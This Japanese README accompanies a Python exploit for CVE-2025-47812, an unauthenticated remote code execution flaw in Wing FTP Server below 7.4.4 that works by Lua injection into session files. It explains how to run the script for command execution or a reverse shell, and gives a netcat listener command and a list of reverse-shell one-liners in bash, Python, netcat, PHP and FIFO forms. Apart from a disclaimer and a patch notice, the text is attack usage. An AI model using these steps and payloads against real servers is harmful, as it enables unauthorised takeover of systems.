
Wing FTP Server < 7.4.4の認証なしリモートコード実行エクスプロイト。セッションファイルのLuaインジェクションを介してコマンド実行とリバースシェルを可能にします。
===========================================================
作成者: blindma1den
日付: 2025年7月
エクスプロイト種別: リモートコード実行(認証不要)
対象: Wing FTP Server < 7.4.4
CVSSスコア: 10.0(緊急)
このスクリプトは、Wing FTP ServerのWebインターフェースにおける重大な脆弱性CVE-2025-47812を悪用します。これにより、リモートの攻撃者は認証なしで任意のシステムコマンドを実行したり、リバースシェルを開いたりすることができます。
この欠陥は、ログインフォーム(/loginok.html)におけるヌルバイト(%00)の不適切な処理に起因します。これにより、セッションファイルへのLuaコードインジェクションが可能になり、/dir.html などのエンドポイントにアクセスした際に、そのコードが後で評価されます。
NVDの説明: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
whoami, uname -a)依存関係のインストール:
pip install requests
スクリプトを実行:
python3 wingftp_rce_exploit.py
次の項目が要求されます:
[1] コマンド実行:
ターゲットURL: http://192.168.1.10:5466
ユーザー名: anonymous
選択(1または2): 1
実行するコマンド(デフォルト: whoami): whoami
[2] リバースシェル:
ターゲットURL: http://192.168.1.10:5466
ユーザー名: anonymous
選択(1または2): 2
リバースシェルのIPアドレス: 192.168.1.100
リバースシェルのポート: 4444
シェルを起動する前にリスナーを開始してください:
nc -lvnp 4444
Bash: bash -i >& /dev/tcp/IP/PORT 0>&1
Python3: python3 -c 'import socket,subprocess,os; ...'
Netcat: nc IP PORT -e /bin/sh
PHP: php -r '$sock=fsockopen("IP",PORT); ...'
FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...
このコードは教育目的のみです。所有していない、またはテストする明示的な許可を得ていないシステムに対して、このエクスプロイトを使用しないでください。不正使用は違法かつ非倫理的です。
直ちにシステムにパッチを適用してください。Wing FTP Server 7.4.4 はこの脆弱性を修正しています。
ハッピーハッキング!